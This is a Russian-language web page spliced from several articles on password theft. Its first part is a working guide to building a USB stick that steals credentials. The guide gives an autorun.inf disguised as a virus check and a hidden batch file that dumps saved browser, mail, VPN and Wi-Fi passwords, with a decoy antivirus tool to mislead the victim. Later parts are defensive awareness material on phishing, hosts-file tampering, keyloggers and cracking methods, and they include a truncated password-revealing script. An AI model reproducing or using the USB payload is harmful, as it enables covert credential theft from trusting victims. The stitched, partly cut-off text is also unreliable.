Как украсть пароли с помощью. Как воруют пароли. Признаки фишинговых писем



реальным тюремным сроком!

Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила.

Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.

Скачаем Password Recovery утилиты, которые нам потребуются:

* MessenPass - восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;

* Mail PassView - извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;

* IE Passview - отображает логины и пароли, сохраненные "осликом";

* ChromePass - отображает логины и пароли, сохраненные браузером Google Chrom;

* PasswordFox - получает все пароли, сохраненные Firefox"oм;

* Protected Storage PassView - восстанавливает все пароли, сохраненные в защищенном хранилище;

* Dialupass - вытаскивает все пароли dialup/VPN сессий;

* Network Password Recovery - отображает пароли которые вы используете для шар в локальной сети а так же пароли.NET Passport/Messenger account;

* PstPassword - извлекает пароли из файлов личных папок Outlook - .PST;

* WirelessKeyView - восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере.

Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор.
Все утилиты можно взять .

Еще нам необходима утилитка Hidden Start ().

Так же скачаем для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране.

Подготавливаем флэшку.

1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\

2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

3. В корне флешки создаем autorun.inf со следующим содержанием:


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы


Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

4. Создаем батник launch.bat:

echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe

Рассмотрим команды батника поподробнее:

echo off – запрет на вывод в окно CMD результатов выполнения

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.

Как же бороться?

1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet.

3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит.

Поводом для написания этой статьи стала заметка в журнале "Хакер".

Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!

Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

16.07.2015 09:37:37

Данный вид сетевого мошенничества состоит в том, чтобы заманить пользователя на поддельную страницу какого-либо сервиса (платежной системы, социальной сети, онлайн-магазина, почтового сервиса) и заставить ввести свой логин и пароль на этой поддельной странице.

Злоумышленник, заманив пользователя на поддельную страницу какого-либо сервиса и заставив ввести свой логин и пароль на этой поддельной странице, получает доступ к вашей учетной записи в настоящем сервисе и может в дальнейшем делать с вашим аккаунтом все, что хочет: снимать деньги, писать поддельные письма вашим знакомым и т. п.

Хотя для фишинга часто используются письма-обманки, следует отличать этот способ мошенничества от обычного почтового спама, вроде «нигерийских писем». Авторы «нигерийских писем» пытаются заставить вас перевести им деньги самостоятельно. Фишинг же предполагает более изощренную технику, когда у вас не просят денег. Наоборот, вам обещают улучшить вашу безопасность.

Фишеры рассылают потенциальным жертвам письма, отправленные якобы от администрации или службы поддержки популярного онлайн-ресурса. Такие письма бывают почти неотличимы от настоящих. Чаще всего в них сообщается о какой-то проблеме, связанной с учетной записью получателя. Например:

  • «В нашем сервисе произошел сбой, возможна утечка конфиденциальных данных. В целях безопасности просим вас сменить пароль, пройдя по данной ссылке...»
  • «Недавно мы зафиксировали несколько попыток войти в вашу учетную запись с зарубежного IP-адреса. Пройдите, пожалуйста, по заданной ссылке для подтверждения личности...»
  • «Данные вашей учетной записи устарели. Если вы не хотите, чтобы ваш аккаунт был удален, пройдите авторизацию...»

Текст может быть сколь угодно убедительным, но в любом случае вам предложат залогиниться: для этого нужно либо перейти по ссылке на сайт (поддельный), либо ввести свои данные в форме, приложенной прямо к письму. И форма для ввода, и целый поддельный сайт могут быть довольно точными копиями настоящего сервиса, включая логотип и остальные элементы дизайна. Однако после того как вы залогинитесь предложенным способом, ваш логин и пароль тут же станут известны мошенникам.

Помимо электронной почты, фишеры могут рассылать свои сообщения через мессенджеры типа ICQ или Skype, внутренние сообщения «ВКонтакте» или иной социальной сети, а также форумы и комментарии. С ростом популярности смартфонов и планшетов появились фишеры, которые создают поддельные веб-страницы для мобильных браузеров.

В чем опасность

Потеря логина и пароля чревата разными неприятностями, даже если речь идет лишь об электронной почте. Не исключено, что при регистрации на каком-то ресурсе вам на почту автоматически направлялось письмо с логином и паролем к этому ресурсу. Кроме того, многие онлайн-сервисы предлагают процедуру восстановления забытого пароля, которая предусматривает отправку письма на ваш электронный адрес, и часто при этом нет никаких дополнительных уровней защиты. Таким образом, ваша почта — это ключ злоумышленника к вашим учетным записям во многих других сервисах.

Кроме того, в вашем почтовом ящике есть еще множество адресов, которые интересует спамеров и мошенников. Выступая от вашего имени, они получают гораздо больше возможностей для вредоносных действий, чем те, кто рассылает мусор с посторонних адресов.

Если же речь идет о доступе злоумышленника к учетной записи в платежной системе, то связанные с этим риски совсем очевидны: вы просто останетесь без денег.

Для скептиков приведем статистику, собранную специалистами «Лаборатории Касперского» на основе данных от пользовательских антивирусных приложений. В 2013 году более 35% попыток зайти на поддельные веб-страницы были связаны с фишинговыми атаками на пользователей социальных сетей, основная доля переходов (22%) пришлась на Facebook. Количество фишинговых атак, приходящихся на платежные системы, было меньше - 31,5%, из которых 22% - для сайтов банков. Еще 23% атак приходилось на почтовые сервисы. Можно сказать, что «прямые» пути к деньгам используются фишерами лишь в каждой третьей атаке.

Следует также иметь в виду, что если вы открыли в браузере поддельную веб-страницу, но не ввели в форму никаких своих данных, - это еще не значит, что вы не стали жертвой мошенников. Открытие поддельных сайтов подразумевает возможность заражения компьютера через критическую уязвимость в операционной системе или браузере.

Признаки фишинговых писем

Наличие на компьютере современного антивирусного комплекса, безусловно, поможет отсеять значительную часть фишинговых писем и веб-страниц. Но в ряде случаев вам придется принимать решение самостоятельно: в самом начале новой атаки антивирусы могут оказаться бесполезны, поскольку новые адреса поддельных сайтов пока еще не попали в черные списки.

Поэтому к любым сообщениям, приходящим к вам по электронной почте или через мессенджер, следует относиться с осторожностью. Фишинговые письма отличаются следующим:

Никакие уважающие себя банки, платежные системы, социальные сети и другие легитимные сервисы не попросят у вас пароль в теле письма или по прямой ссылке из письма. При необходимости сделать что-либо в вашем профиле официальное письмо предложит вам самостоятельно открыть в браузере официальный сайт сервиса и осуществить те или иные действия - без длинных прямых ссылок в какие-то внутренние разделы.

При этом в ответ на ваши действия на ваш электронный адрес действительно могут приходить официальные письма, содержащие прямые ссылки - но в этих письмах должно быть явно оговорено, какие ваши действия на сайте вызвали ответ (например, вы попросили восстановить пароль). Это означает, что если вы никого ни о чем не просили, а вам пришло письмо, где утверждается обратное, - его следует проигнорировать.

Странное обращение

Нередко фишеры рассылают сообщения массово, рассчитывая на популярность целевого сервиса. Такие письма получают как пользователи сервиса, так и люди, которые никогда не имели на нем учетной записи. Если вы получили письмо от сервиса, которым не пользуетесь, это очевидный признак письма-ловушки.

Может случиться и так, что у фишеров имеются какие-то данные о пользователях целевого сервиса, так что письма рассылаются избирательно. Однако это не значит, что злоумышленники располагают личными данными пользователей. Если в официальных письмах от сервиса к вам обычно обращаются по имени, указанному вами при регистрации, и вдруг вы получаете письмо, где личного обращения нет или в качестве обращения используется просто электронный адрес, - перед вами, скорее всего, ловушка.

Подозрительный домен

В подавляющем большинстве случаев ссылка-ловушка в фишинговом письме будет вести на сайт, который не имеет к настоящему сервису никакого отношения. Всегда старайтесь обращать пристальное внимание на адреса в письмах. Если речь идет, например, об аукционе eBay, правильные ссылки должны иметь вид: https://<поддомен>.ebay.com/<страница >. Фишерские ссылки будут вести на другой домен: это может быть «.ebay.com.customer.service.com/» или «.ebay.com-customer-service.com/» или «.customers-ebay.com/» или даже «.eaby.com/». Особые подозрения должны вызывать случаи, когда вместо доменов используются просто IP-адреса, то есть цифровые последовательности вроде «100.17.234.1».

В письмах HTML-формата текст ссылки и реальный адрес ссылки - это два независимых понятия. Это значит, что если словами в письме написано «https://www.ebay.com/ », то по нажатии на такую ссылку может открыться совсем другая страница. Чтобы проверить это, вовсе не обязательно на ссылку нажимать - достаточно навести на нее мышку и подождать всплывающей подсказки.

Бывают ситуации, когда ссылка выглядит вполне правильной даже в адресной строке браузера, но фактически ведет на поддельную страницу. Это случается редко, поскольку требует от фишеров дополнительных усилий, связанных со взломом официального сайта сервиса или взломом сервера доменных имен. Тем не менее, данную возможность следует учитывать, то есть помнить о правилах 1 и 2.

Как решать проблему

Несмотря на эти несложные правила безопасности, многие люди все равно отдают свои пароли фишерам. Однако ситуацию можно исправить, если быстро распознать проблему.

Признаки того, что вы стали жертвой фишинга:

  1. Подозрительные транзакции по вашим банковским счетам и счетам платежных систем могут свидетельствовать о том, что кто-то посторонний получил к ним доступ.
  2. Жалобы от знакомых на то, что от вас к ним приходят странные электронные письма или сообщения в социальной сети, могут говорить о том, что ваша почта или учетная запись социальной сети скомпрометированы.
  3. Странные письма в папке «Отправленные» и входящие письма с инструкциями для восстановления забытого пароля, о которых вы не просили, также означают, что вашим почтовым ящиком пользуется кто-то еще.

Если вы поняли, что стали жертвой фишеров, нужно немедленно выполнить следующие действия:

  1. Первым делом нужно проверить компьютер на вирусы: напомним, что заходить на поддельный сайт опасно даже тогда, когда вы не заполняли там никакие формы. Нужно убедиться, что в памяти компьютера не «висят» программы-шпионы, которые собирают пароли. Иначе, даже если вы восстановите доступ к своей учетной записи, вы можете снова его потерять в тот же день.
    Более подробная информация - в статье .
  2. Получив доступ к чужой учетной записи, фишеры обычно заинтересованы в том, чтобы жертва как можно дольше не знала об этом (например, чтобы украсть со счета не только текущие накопления, но и новые). Есть шанс, что фишер не будет менять пароль вашей учетной записи, и у вас сохранится доступ к ней. Поэтому второй важный шаг - сменить скомпрометированный пароль и лишить фишеров доступа.
  3. Если вы использовали этот же пароль на других сервисах, лучше поскорее сменить его и там. А если речь идет об украденном пароле к почтовому ящику, стоит перестраховаться и сменить пароли везде, где только можно. Ведь если злоумышленники хотя бы ненадолго получили доступ к вашему почтовому архиву, это означает, что они могли его скачать и изучить. В старых письмах часто хранится информация, о которой вы и думать забыли, - в том числе и пароли к другим сервисам. Кроме того, почтовый адрес часто используется для восстановления паролей к самым разным сервисам, что только усугубляет ситуацию.
  4. Если дело дошло до кражи денежных средств, следует связаться с банком или платежной системой и сообщить о том, что к вашем счету получил доступ посторонний. Если деньги были похищены недавно - вполне возможно их удастся вернуть.
  5. Если платежи были осуществлены с помощью кредитных карт, такие карты лучше заблокировать и перевыпустить.

Нам необходимы интересные и полезные статьи для публикации нашего форума. Корректор и редактор у нас есть, поэтому не стоит переживать за орфографию и оформление текста. Все проверим и красиво оформим.


За последние дни в новостях рассказали, что в Интернете выложили логины и пароли от миллионов почтовых ящиков почты Гугла (Gmail), почты Яндекса и почты mail.ru. Подобрать любой мало-мальски сложный пароль невозможно, поскольку большинство сервисов настроено так, что после нескольких ошибок предлагает пользователю вводить капчу, либо же просто блокирует IP с которого ведётся брутфорсинг. В подавляющем большинстве в утечке паролей виноваты не хитроумные взломы популярных сервисов, а сами пользователи, которые допустили компрометацию пароля. Поэтому хотелось бы коснуться вопроса, как хакеры воруют ваши пароли и что можно сделать, чтобы это предотвратить.

1. Поддельные страницы авторизации

Суть заключается в следующем. Под любым предлогом пользователя заманивают на сайт хакера. Зачастую, на этом сайте одна единственная страница, но выглядит она в точности, как настоящая страница для авторизации в вашем почтовом ящике. Невнимательный пользователь вводит логин и пароль, которые прямиком попадают к злоумышленнику.

Как бороться:

– каждый раз, когда возникает необходимость авторизации, посмотрите на домен. Зачастую, злоумышленники могут создавать созвучные доменные имена, например:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

Каждый из этих доменов не имеет ни какого отношения к популярным почтовым сервисам. Как правило, авторизация запрашивается не каждый раз, поэтому прежде чем ввести пароль потратьте некоторое время на изучение доменного имени.

Отдельно стоит обратить внимание на то, как хакеры пытаются заманить вас на свои зловредные страницы. Приведу несколько примеров, но ими варианты не исчерпываются:

– вам на почту приходит письмо, в котором сообщается, что вы, что-то получили (открытку или что-то другое приятное, или наоборот – что-то очень неприятное и требуются ваши немедленные действия, чтобы аккаунт не заблокировали, деньги не потерялись и т.д.) и есть ссылка по которой надо перейти;

– в смс сообщается, что вы получили письмо и предлагается перейти по ссылке, чтобы прочитать это письмо (чтобы у мужчин отключился мозг, может быть уточнено, что письмо отлучен от <любое женское имя>).

– во всплывающих окнах на сайтах или в программах сообщается, что вы получили письмо.

Помните об этом, будьте просто внимательны. Обращайте внимание на мелочи. Например, зачастую мы выбираем в браузере опцию «Сохранить пароль», и когда настоящий почтовый сервис просит повторно авторизоваться (это случается время от времени), то оба окошечка (и логин и пароль) зачастую уже заполнены и нам нужно нажать только кнопку входа. Хакеры могут вписать ваш логин (особенно если отправляли вредоносную ссылку вам по почте), но хакеры не могут вписать пароль. Поэтому, если вы заметили необычное поведение, внимательно изучите домен. Если домен правильный, но всё равно что-то не так, то возможно у вас другая проблема, которая рассмотрена в следующем пункте.

2. Переадресация через файл hosts

В любом компьютере под управлением операционной системы Windows есть файл hosts, который располагается в каталоге C:WindowsSystem32Driversetc

Представляем вашему вниманию новый курс от команды The Codeby - "Тестирование Веб-Приложений на проникновение с нуля". Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое.


Там можно прописать переадресацию. В результате которой домен в адресной строке вашего браузера будет совершенно истинным, но в реальности вы будете попадать на страничку авторизации хакеров, которые, естественно, украдут ваш пароль:

На что обратить внимание:

– откройте любым текстовым редактором файл C:WindowsSystem32Driversetchosts и посмотрите в него — там не должно быть упоминаний популярных сайтов, или чего-то подозрительного;

– ещё одним показателем является то, что вы вводите верные логин и пароль, но авторизация не происходит;

– на странице авторизации вас просят отправить смс на короткий номер под любым предлогом (подтверждения телефона, попытка взлома и подтверждения, что это вы, акаунт не активен и будет удалён если не подтвердить, необходимо ввести числа полученные в ответном смс сообщении и т. д.).

Как с этим бороться:

– обычно, файл hosts изменяется вирусами, необходимо установить антивирусную программу, если таковой нет и проверить компьютер. Если антивирусная программа есть, обновите её и проверьте компьютер.

– удалить лишние строки из файла hosts

3. Программы для отслеживания нажатий на клавиатуре (килогеры)

Ещё одним вариантом являются килогеры. Это такие программы, которые перехватывают всё, что вы набираете на клавиатуре и отправляют хакеру. Фактически, это вирусы, и бороться с этими программами нужно точно так же как и с другими вирусами. Если вашу почту постоянно «взламывают», то проверьте компьютер антивирусом, не скачивайте подозрительные исполняемые файлы (у них расширение.exe, .msi, .hta, .scr, могут быть и некоторые другие, но в чаще всего всё-таки.exe). Установите антивирус, который может обновляться, регулярно его обновляйте и проверяйте свой компьютер (ну или переходите на Linux).

Как с этим бороться:

– если вы обнаружили вирус, то, на всякий случай, поменяйте свои пароли от почты и от социальных сетей;

– об этом уже говорилось, но это такая распространённая ошибка, что подчеркну ещё раз, не скачивайте исполняемые файлы из подозрительных источников. Скачивайте их с официальных сайтов. Не скачивайте файлы, присланные вам почту от незнакомых людей (даже если это фотографии "меня в купальнике" и т.п.). Относитесь с осторожностью к исполняемым файлам, даже если они присланы знакомыми вам людьми – могло получиться так, что их почту взломали раньше вашей и от их имени хакер рассылает свои вредоносные программы;

– в Интернет кафе и во всех ситуациях, когда нужно залогиниться на чужом компьютере, используйте экранную клавиатуру, это не является 100% гарантией, но многим килогерам такой поворот будет не по зубам.

Как бы это уныло не звучало, но именно такими тривиальными путями большинство пользователей теряют свои пароли, и здесь не имеют место ни сложные хакерские атаки на почтовые сервисы, ни изощрённый криптоанализ.

Андрей Березов

Всем доброго времени суток. Закончились предновогодние авралы и зимние каникулы и пора уже что-нибудь написать в блог. Первую запись в этом году я хочу посвятить ликбезу по методам кражи паролей в противовес одной из предыдущих публикаций: Когда вас «взломали» не обязательно бежать менять все пароли . Сразу стоит уточнить, что материал направлен на неспециалистов по защите информации и носит ознакомительный характер. Хотя, возможно, специалисты тоже подчерпнут для себя что-то новое.

Как бы все не ненавидели пароли, это по сей день остается наиболее популярным средством идентификации, но, к сожалению, иногда у нас их крадут. Частично проблему помогает решить двухфакторная аутентификация, но лишь частично и лишь для наиболее критичных сервисов.

По статистике наиболее распространенными причинами потери контроля над аккаунтами становятся две вещи: использование простых (словарных) паролей и социальная инженерия. В этой статье я расскажу об основных методах взлома паролей естественно с целью повышения осведомленности в этом вопросе у широкой аудитории (использование материалов в деструктивных целях карается законом, автор ответственности не несет и прочее бла-бла-бла).

  1. Угадывание

Да, все так просто. Ваш пароль могут тупо угадать. Помните все эти эпизоды в голливудских фильмах, когда герои взламывают чей-то компьютер и в качестве пароля пробуют имена детей, бабушек, дедушек, дядь, теть, клички домашних животных жертвы и т. д.? Так вот, это действительно один из действенных способов взлома и этот архаичный метод эффективен до сих пор. Ведь сейчас все публикуют тонны информации о себе в социальных сетях и если пароль основан на каких-то данных, связанных с личностью владельца взламываемого аккаунта, то подбор пароля - дело времени (это как раз является причиной того, почему пароли нужно периодически менять).

Противодействие методу: в общем, надеюсь, вы поняли, что «tanyushka1990» - это плохой пароль, даже если Танюшка это не вы, а ваша любимая внучка. Используйте не угадываемые интуитивно пароли. Периодически (не реже раза в год) меняйте пароли хотя бы к критичным аккаунтам.

  1. Социальная инженерия

Социальная инженерия понятие достаточно широкое. Социальный инженер может взаимодействовать с жертвой как лично, так и по телефону, но чаще всего взаимодействует по электронным каналам связи - мессенджеры, соцсети, электронная почта. И здесь мы не будем рассматривать методы социнженерии как таковые, тут я лучше посоветую почитать классику жанра - книгу В. Саймона и К. Митника «Искусство обмана». Здесь нам важно то, что методы социальной инженерии в плане кражи паролей направлены на то, чтобы заставить жертву саму отдать свой пароль. Один из примеров выглядит так: злоумышленник представляется новым системным администратором и говорит сотруднику вашей организации, что ему нужен пароль от электронной почты этого сотрудника для проведения каких-нибудь сферических вакуумных тестов. Другой пример, когда личный контакт злоумышленника с жертвой отсутствует: веерная рассылка с ссылкой и тревожным сообщением (например, на ваш аккаунт нажаловались, его заблокировали и вам «нужно» пройти по ссылке для разблокировки). Фишинговая ссылка ведет на страницу, заранее подготовленную злоумышленником и один в один похожую на страницу авторизации какого-нибудь популярного сервиса, например: vk.com, gmail.com, facebook.com и т. д. Что происходит дальше: жертва, думая, что это легальный сервис, вводит свой логин и пароль, эти идентификационные данные отправляются злоумышленнику, выдается сообщение об ошибке (ну кто из нас никогда не ошибался при вводе пароля? всякое бывает!) и далее пользователь перенаправляется на настоящую страницу авторизации, ведь грязное дело уже сделано и жертву нет смысла держать на поддельной странице. Кстати, если кто-то еще не знает, почему Windows просит нажать сочетание клавиш Alt-Ctrl-Del перед входом в систему, настоятельно советую загуглить и почитать.

Противодействие методу: обычно на предприятиях используются гибридные методы противодействия социальной инженерии (на тех предприятиях естественно, где вообще озаботились вопросами защиты информации), но нужно понимать, что поскольку социальный инженер может провзаимодействовать с жертвой и без использования каких-либо каналов связи (и, соответственно отфильтровать, заблокировать, отследить его сообщения мы не сможем), то единственным действительно эффективным методом противодействия является информирование сотрудников (ну, или себя самого, если речь идет о личной безопасности) о методах социальной инженерии. Ведь в наши дни мало кто поведется на наследство нигерийского принца или на развод «Мама, закинь денег на номер ХХХХ. Потом объясню», а ведь когда-то эти методы работали.

  1. Подглядывание

Здесь только вскользь упомяну о таких очевидных вещах, как о паролях на стикерах, которые приклеены к монитору или на бумажках под клавиатурой. Под подглядыванием здесь можно понимать и подглядывание процесса набора пароля. То есть пароль лучше вводить, когда за процессом никто не наблюдает. Есть люди с интересными способностями. Например, один мой знакомый поспорил со мной, что посмотрит, как я ввожу пароль на ноутбуке, а потом повторит ввод этого пароля сам. И действительно повторил. Я очень удивился, так как владею слепым десятипальцевым набором и могу ввести свой пароль очень быстро. Оказалось, что у знакомого какая-то особенная фотографическая память. Опасный человек =)

То есть подглядывание помогает злоумышленнику быстро получить готовый пароль и не прибегать к другим более сложным или ресурсоемким техникам, о которых речь пойдет далее. Но подглядывание пароля «глазами» это не единственный способ. Например, если вы вводили свой пароль на чужом компьютере и случайно сохранили пароль, вышли из аккаунта, но не очистили данные, то кто-то другой может не только войти в аккаунт не зная пароля (это еще полбеды), но и выудить этот пароль в явном виде, вставив в адресную строку браузера на странице где введен логин и пароль (замаскирован звездочками) вот такой простой скрипт:

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j

[свернуть]

Если пароль используется на других аккаунтах, то злоумышленник может получить доступ и к ним тоже. Вот поэтому специалисты по безопасности категорически не рекомендуют использовать один и тот же пароль для разных аккаунтов.

Противодействие методу: не вводите пароль, когда кто-то стоит рядом и смотрит на ваши руки. Не вводите пароль на недоверенных устройствах. Если все же пришлось, позаботьтесь об очистке информации о паролях и cookies. К тому же на недоверенных устройствах могут быть установлены кейлоггеры .

  1. Подбор паролей по словарям

Мы плавно перешли от интуитивных и мошеннических техник угона паролей к техническим. Первая из них это подбор паролей по словарям. Пожалуй, даже неспециалисты в области информационной безопасности слышали из новостей о крупных утечках паролей к почтовым ящикам на разных почтовых сервисах. Как потом выяснилось большинство из этих утечек было связано не со взломами серверов поставщика услуг, а с банальным подбором паролей к почтовым ящикам по словарям. Большинство паролей «взломанных» почтовых ящиков представляли из себя комбинации типа «123456», «qwerty» и тому подобные. В разделе «Материалы» я выложил парочку словарей с паролями (их можно пополнять самостоятельно), которые можно использовать как в различных инструментах типа John the Ripper или Hydra , либо для проверки банальным поиском есть ли в словаре ваш пароль. Если есть, то срочно меняем!

Противодействие методу: использование сложных, не словарных паролей.

  1. Брутфорс

Название метода происходит от двух английских слов: brute - грубая и force - сила. Из названия интуитивно понятно, чем этот метод отличается от предыдущего - здесь просто перебираются все возможные комбинации пароля. Метод затратен по времени и по ресурсам, ведь для подбора таким методом нужны немалые вычислительные ресурсы. Поэтому к такому методу злоумышленники прибегают только в крайних случаях. Уменьшить время подбора может позволить, например, знание точной длины пароля или знание того, что в пароле точно нет специальных символов и цифр. Таким образом, сокращается количество возможных комбинаций.

Противодействие методу: использование длинных хаотичных паролей и периодическая смена паролей.

  1. Радужные таблицы

Все кому в последние годы приходилось восстанавливать пароль к какому-либо сервису должны были заметить, что если раньше некоторые сервисы просто присылали вам ваш пароль на электронную почту, то теперь вам нужно сразу же придумать новый пароль. Это связано с тем, что ни один уважающий себя сервис не хранит пароли в открытом виде. Хранятся пароли в виде хешей. Если коротко, то хешем называется результат преобразования текста (в нашем случае - пароля) некой необратимой математической функцией. Результат преобразования распространенным алгоритмом MD5 слова «password» (без кавычек) выглядит следующим образом:. Примерно в таком виде и хранятся наши пароли у провайдеров услуг, и поскольку считается, что функции необратимые, то сами провайдеры вроде как не могут знать наш пароль и выслать нам его в открытом виде. Подробнее о хешировании можно почитать .

Радужные таблицы, если очень грубо говорить позволяют восстановить пароль по хэшу. Полный процесс конечно гораздо сложнее, чем кажется. Поэтому, кому интересно ознакомиться с технологией подробнее, можно начать со страницы в википедии . Казалось бы, что с помощью радужных таблиц можно было бы взломать почти любой пароль, но и тут есть свои сложности для злоумышленника. Если при брутфорсе нужны временные и ресурсные затраты на сам перебор, то в случае радужных таблиц то же самое нужно для генерации этих самых таблиц. При этом любой набор радужных таблиц будет иметь множество ограничений, к ним относятся: ограничение на длину пароля, ограничение на набор символов, ограничение на конкретный алгоритм хэширования. В сети в общем доступе можно найти радужные таблицы для подбора паролей не длиннее 6 символов, которые содержат только буквы английского алфавита обоих регистров, но без спецсимволов и цифр. Но вот уже за что-то посерьезнее просят денег.

Противодействие методу: засолка хешей. К сожалению, данный вид противодействия доступен только на уровне администраторов сервисов и никак не зависит от действий конечного пользователя.

  1. Гибридные методы

Под гибридными методами понимается сочетание различных методов, приведенных выше, в совокупности. На самом деле, пример использования методов «брутфорс» + «подглядывание» уже был приведен выше. Например, злоумышленник может подсмотреть не пароль целиком, а лишь символы, из которых состоит пароль. Это позволит ему в параметрах при брутфорсе указать только нужные символы, а все остальные исключить из перебора, тем самым существенно сократив количество возможных комбинаций.

Еще один пример гибридного метода: берется словарное слово и в нем делаются замены букв на спецсимволы. Например, берется словарный пароль «password» и пробуются комбинации «password123», «p@ssword», «pa$$w0rd» и т. д.

Противодействие гибридным методам заключается в использовании всех методик противодействия, приведенных выше.